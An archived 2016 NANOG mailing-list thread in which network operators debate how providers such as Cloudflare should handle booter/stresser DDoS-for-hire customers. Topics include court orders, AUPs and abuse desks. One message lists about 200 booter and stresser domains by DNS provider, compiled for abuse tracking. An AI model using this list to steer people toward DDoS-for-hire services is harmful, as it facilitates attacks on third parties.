Besides legal costs I've informed customers that I will charge them (insert billable hourly rate) for any complaints or similar our staff has to field beyond what we'd consider a normal volume which is pretty low. One guy who wasn't quite to the level of spamming as usually conceived, not in intent, but ran a professional content list but had a bad habit of wholesale adding mail addresses -- this was quite a while ago when such things weren't so clear. I finally billed him ~$1,000 after several warnings and he paid it and said he understood that our time is worth money. I kind of felt bad because I didn't believe his intentions were in any way malicious. Mostly he'd scrape similarly themed lists and websites, but we really were getting quite a few complaints per day some which merited responses...and he did run the list to promote his own consulting. But at some point time really is money. I suppose that sort of thing could be used in a case like this where someone hosts a web site of questionable intent but never uses your service to actually do anything questionable. If it incurs you costs such as telling people you're not the right party it seems reasonable to expect reimbursement. I think the law uses the term "attractive nuisance". Which of course leads to shutting someone down if they refuse to pay. Again you've reduced it to just a credit or payment issue rather than citing the content specifically other than perhaps as an explanation why you're getting too many complaints. -- -Barry Shein Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
The difference between everyone posting here and for example the intellectual property folks like RIAA is the latter has organization and money. As I said earlier one thing that organization and money has done is defined, with some precision, where the boundaries are. It's a moving target but that's a lot better than nothing. And money for lobbyists etc to go to govts and courts to impress them with their point of view and even get it written into law and precedents. It's not perfect, nothing is, but when someone puts up a music sharing service with a million recordings none authorized in Lower Slobbovia they usually manage to get it shut down (that happens, ok not Lower Slobbovia exactly.) Something else they get is budget assigned to law enforcement agencies to pursue those commercial violations. I remember speaking early on to someone in an FBI office about spam and related, this was probably ca 2000, and he completely sympathized but said sorry, the FBI has no budget to pursue such things. Like many very nice people you think LEAs pursue crimes merely because they are crimes. That the money to do so just appears on demand because IT'S A CRIME! Book 'em Dan-o! Hah! I'll repeat that. Hah! These are commercial crimes not terrorism or kidnapping or murder or tearing those labels off mattresses. Much more difficult to get on LEAs radar. On the darker side be careful what you wish for. You won't personally be defining these boundaries. People like lobbyists and policy wonks and legislators will. People this hypothetical organization hires and those influenced by those hires. People who can spend full time wordsmithing all this and getting attention. It takes very active involvement to steer good intentions to good results and not just end up with scattershot gibberish or worse overbearing laws which do more harm than good. And that all takes organization and money and involvement not postings on NANOG except inasmuch as they might lead to organization and money etc. It's possible and maybe even desirable but what I see here ain't it. -- -Barry Shein Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
On 28 July 2016 at 19:27, chris <tknchris@gmail.com> wrote:
They don't discriminate, anyone can be a customer https://www.youtube.com/watch?v=T4GfoSZ_sDc
great quote from the reporter "why do you need a court order to do the right thing?"
Only failure here is accepting interview request from FOX. Who obvious just want to be sensational rather than have an actual discussion. -- ++ytti
What he said. If I am given a court order and follow it, I can't get sued when I knock you off the Internet. Steven Naslund
-----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Randy Bush Sent: Friday, July 29, 2016 8:04 AM To: chris Cc: North American Network Operators' Group Subject: Re: EVERYTHING about Booters (and CloudFlare)
great quote from the reporter "why do you need a court order to do the right thing?"
because i am not judge and jury. we leave that to network technicians.
randy
On Fri, 29 Jul 2016, Naslund, Steve wrote:
What he said. If I am given a court order and follow it, I can't get sued when I knock you off the Internet.
Steven Naslund
Because someone breaking AUPs and TOS is not enough. "Hey I know you broke every rule in the book. Forget that for now I am not a judge, feel free to DDoS, steal someone's life savings with your malware/phishing. You're fine by me until a judge tells me otherwise." -- Smart answer -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
On 29 Jul 2016, at 20:34, J. Oquendo wrote:
Because someone breaking AUPs and TOS is not enough.
The AUP, the TOS, and the RFP are the most powerful security tools any network operator has at their disposal - assuming they've invested some time and effort in crafting them, and in ensuring they can be enforced. ----------------------------------- Roland Dobbins <rdobbins@arbor.net>
On Fri, Jul 29, 2016 at 08:58:23PM +0700, Roland Dobbins wrote:
The AUP, the TOS, and the RFP are the most powerful security tools any network operator has at their disposal - assuming they've invested some time and effort in crafting them, and in ensuring they can be enforced.
This. A hundred times this. And keep in mind that these tools are not just to protect your operation; they're to protect the Internet *from* your operation. ---rsk
On Wed, Jul 27, 2016 at 03:09:51PM +0000, Steve Mikulasik wrote:
I am sure a lawyer would see it very differently, [...]
For what it's worth I agree, but I'm not an attorney (and neither are most of us), so I'll write from the perspective of an operator. The healthy functioning of the Internet community relies on mutual cooperation. It always has. Part of that cooperation is ensuring that one's own operation, whether it's a single server or a worldwide collection of data centers, is not an operational hazard to the rest of the Internet. That is our first, our primary, our over-arching responsibility at all times. Understanding it, embracing it, and practicing it is something required of all of us. This isn't a question of what's legal and what's not -- after all, that varies by jurisdiction and it's a moving target and the machinery of jurisprudence moves a few orders of magnitude more slowly than does Internet technology. It's a question of what's right. We should all know that hosting spammers or phishers, DoS-attackers or carders, or anyone/anything like that is wrong. (Yes, there are gray areas where reasonable people can differ about what's right/wrong. But these are not among them.) We should all be doing everything we can to avoid giving them services, and if we fail in that, if they get by our screening, we should be cutting them off the moment we're aware of their presence, and banning them permanently, AND informing other operators in order to forestall their relocation. This doesn't require legal involvement: it requires ToS that stipulate it, and if, in 2016, any service *doesn't* have ToS that stipulate these things: you need to get new attorneys and fix that today. It also requires having a functioning abuse@ address (per RFC 2142 and decades of best practices) that connects to a functioning abuse department that is empowered to investigate and act on everything that shows up there. In a better world, this wouldn't be necessary: abuse sources/sinks/facilitators would already know of their own involvement and nobody would need to tell them. But we don't live in that world and in some cases, it's arguably difficult to tell even for very diligent operators. So if third parties are doing you the incredibly gracious favor of reporting abuse to you, thus making *your* job easier despite the fact that *your* operation is making their job harder...you should listen. You should investigate. You should say thank you. You should report the outcome. This isn't hard. It's really not. (And to those who say "we get too many abuse complaints", there is a very simple fix for that: stop facilitating so much abuse. The complaints will drop proportionately.) The alternative to this is an Internet of escalating attacks and abuse -- which is where we find ourselves after a few decades of incompetence and negligence (those who can't be bothered) and deliberate support (those who choose to take dirty money and cash in on abuse). It's already pretty bad, which is why there are now entire sectors built on mitigating it. We can either continue to light stacks of money on fire (and that's one of the smaller costs of this) trying to stave this off or we can do what we should have been doing all along: be *personally* responsible for what our technology is doing. No excuses. No stonewalling. No blowoffs with a nod to the legal department. Just step up and do the right thing for the good of the community -- because without that community, even the biggest, richest operation is of no importance and value whatsoever. ---rsk
On Wed, Jul 27, 2016 at 10:37:21AM -0400, Paras Jha wrote:
From just a preliminary test, more than half of these domains are hiding behind Cloudflare, and OVH has a sizable fraction too. I suppose it's inevitable, given that both are known for having non-existent abuse departments.
Here's the list sorted by DNS provider. (Of course the DNS provider isn't necessarily the hoster.) This list omits domains which don't seem to have NS records at the moment. above.com bootr.org above.com formalitystresser.com above.com masterboot.net above.com olympusstresser.org above.com renegade-products.net above.com royalbooter.de arubadns.cz hyperstresser.com arubadns.net hyperstresser.com axc.nl umbstresser.net bodis.com vbooter.com bookmyname.com evilbooter.net cloudflare.com alphastress.com cloudflare.com anonymous-stresser.net cloudflare.com aurastresser.com cloudflare.com beststresser.com cloudflare.com boot4free.com cloudflare.com booter.eu cloudflare.com booter.org cloudflare.com booter.xyz cloudflare.com bullstresser.com cloudflare.com buybooters.com cloudflare.com cnstresser.com cloudflare.com connectionstresser.com cloudflare.com crazyamp.me cloudflare.com critical-boot.com cloudflare.com cstress.net cloudflare.com cyberstresser.org cloudflare.com darkstresser.info cloudflare.com darkstresser.net cloudflare.com databooter.com cloudflare.com ddos-fighter.com cloudflare.com ddos-him.com cloudflare.com ddos.city cloudflare.com ddosbreak.com cloudflare.com ddosclub.com cloudflare.com ddostheworld.com cloudflare.com defcon.pro cloudflare.com destressbooter.com cloudflare.com destressnetworks.com cloudflare.com diamond-stresser.net cloudflare.com diebooter.com cloudflare.com diebooter.net cloudflare.com down-stresser.com cloudflare.com downthem.org cloudflare.com exitus.to cloudflare.com exostress.in cloudflare.com free-boot.xyz cloudflare.com freebooter4.me cloudflare.com freestresser.xyz cloudflare.com grimbooter.com cloudflare.com heavystresser.com cloudflare.com hornystress.me cloudflare.com iddos.net cloudflare.com inboot.me cloudflare.com instabooter.com cloudflare.com ipstresser.co cloudflare.com ipstresser.com cloudflare.com jitterstresser.com cloudflare.com k-stress.pw cloudflare.com layer-4.com cloudflare.com layer7.pw cloudflare.com legionboot.com cloudflare.com logicstresser.net cloudflare.com mercilesstresser.com cloudflare.com mystresser.com cloudflare.com netbreak.ec cloudflare.com netspoof.net cloudflare.com networkstresser.com cloudflare.com neverddos.com cloudflare.com nismitstresser.net cloudflare.com onestress.com cloudflare.com onestresser.net cloudflare.com parabooter.com cloudflare.com phoenixstresser.com cloudflare.com pineapple-stresser.com cloudflare.com powerstresser.com cloudflare.com privateroot.fr cloudflare.com purestress.net cloudflare.com quantumbooter.net cloudflare.com quezstresser.com cloudflare.com ragebooter.net cloudflare.com rawlayer.com cloudflare.com reafstresser.ga cloudflare.com restricted-stresser.info cloudflare.com routerslap.com cloudflare.com sharkstresser.com cloudflare.com signalstresser.com cloudflare.com silence-stresser.com cloudflare.com skidbooter.info cloudflare.com spboot.net cloudflare.com stormstresser.net cloudflare.com str3ssed.me cloudflare.com stressboss.net cloudflare.com stresser.club cloudflare.com stresser.in cloudflare.com stresser.network cloudflare.com stresser.ru cloudflare.com stresserit.com cloudflare.com synstress.net cloudflare.com titaniumbooter.net cloudflare.com titaniumstresser.net cloudflare.com topstressers.com cloudflare.com ts3booter.net cloudflare.com unseenbooter.com cloudflare.com vbooter.org cloudflare.com vdos-s.com cloudflare.com webbooter.com cloudflare.com webstresser.co cloudflare.com wifistruggles.com cloudflare.com xboot.net cloudflare.com xr8edstresser.com cloudflare.com xtreme.cc cloudflare.com youboot.net cloudns.net bemybooter.eu crazydomains.com buzzbooter.info dnsnuts.com stagestresser.com dnsnuts.com ufa-booters-tools.com domaincontrol.com ddos.tools domaincontrol.com iridiumstresser.net domaincontrol.com national-stresser.net domaincontrol.com onionstresser.com domaincontrol.com pokent.com domaincontrol.com xenon-stresser.com domaindiscover.com instinctproducts.com foundationapi.com booter.in foundationapi.com mini-booter.com free-h.org darkbooter.fr free-h.org omega-stresser.us freenom.com boot.ml freenom.com kth-stress.tk hichina.com stresser.cc hostinger.co.uk powerdos.co.uk hostinger.fi nuke.pe.hu hostnet.nl darkstresser.nl hostnetbv.com darkstresser.nl hostnetbv.nl darkstresser.nl ibspark.com ddos-ip.com ibspark.com national-stresser.com ibspark.com time-stresser.pw kdnetworks.net stressed.pw kirklanddc.com asylumstresser.com myhostadmin.net battle.pw name-services.com anonymous-stresser.com name-services.com avengestresser.com name-services.com celerystresser.com name-services.com ddosit.net name-services.com ddosit.us name-services.com ddossite.com name-services.com divinestresser.com name-services.com down-stresser.us name-services.com ebolastresser.com name-services.com emaizstresser.net name-services.com exile-stresser.net name-services.com hazebooter.com name-services.com ionbooter.com name-services.com isitdownyet.com name-services.com lifetimeboot.com name-services.com networkstresser.net name-services.com omegastresser.com name-services.com powerstress.com name-services.com stuxstresser.com name-services.com xrshellbooter.com name.com infectedstresser.net name.com netstress.net namebrightdns.com dreamstresser.com namebrightdns.com netspoof.com namebrightdns.com yakuzastresser.com namecheaphosting.com ipstresstest.com namecheaphosting.com respawn.ca one.com equinoxstresser.net one.com riotstresser.com one.com wifistruggles.net parkingcrew.net b-h.us parkingcrew.net buyddos.com parkingcrew.net freezystresser.nl parkingcrew.net getsmack.de parkingcrew.net optimusstresser.com parkingcrew.net stress-me.net parkingcrew.net superstresser.com parkingcrew.net xrstresser.net parklogic.com fagstresser.net parktons.com ddoser.xyz registrar-servers.com anonymousbooter.com registrar-servers.com bigbangbooter.com registrar-servers.com booter.io registrar-servers.com kryptonic.pw registrar-servers.com network-stressing.net registrar-servers.com orcahub.com registrar-servers.com ragebooter.com registrar-servers.com stresser.info registrar-servers.com thestresser.com registrar-servers.com, network-stressing.net rentondc.com cyber-sst.com rentondc.com vdoss.net rookdns.com chargen.cf rookdns.com dejabooter.com rookdns.com emo-stresser.com rookdns.com minecraftstresser.com rookdns.com nightlystresser.ml rookdns.com speed-stresser.com rookdns.com vex-stresser.net rookdns.com xtremebooter.com sedoparking.com booter-sales.hourb.com sedoparking.com stresser.org strong-stresser.com strong-stresser.com technorail.com hyperstresser.com tini4u.net ddos.kr udag.de hydrostress.com udag.net hydrostress.com udag.org hydrostress.com ztomy.com foreverinfamous.com ---rsk
participants (37)
-
Aaron
-
Adrian
-
Alain Hebert
-
Baldur Norddahl
-
bzs@theworld.com
-
bzs@TheWorld.com
-
Ca By
-
chris
-
Christopher Morrow
-
Dan Hollis
-
Donn Lasher
-
Dovid Bender
-
Hugo Slabbert
-
J. Oquendo
-
Jair Santanna
-
Justin Paine
-
Ken Chase
-
Mark Andrews
-
McDonald Richards
-
Miles Fidelman
-
Naslund, Steve
-
Niels Bakker
-
niels=nanog@bakker.net
-
Owen DeLong
-
Paras Jha
-
Paul WALL
-
Phil Rosenthal
-
Randy Bush
-
Rich Kulawiec
-
Roland Dobbins
-
Saku Ytti
-
Seth Mattinen
-
Stephen Satchell
-
Steve Atkins
-
Steve Mikulasik
-
TR Shaw
-
Valdis.Kletnieks@vt.edu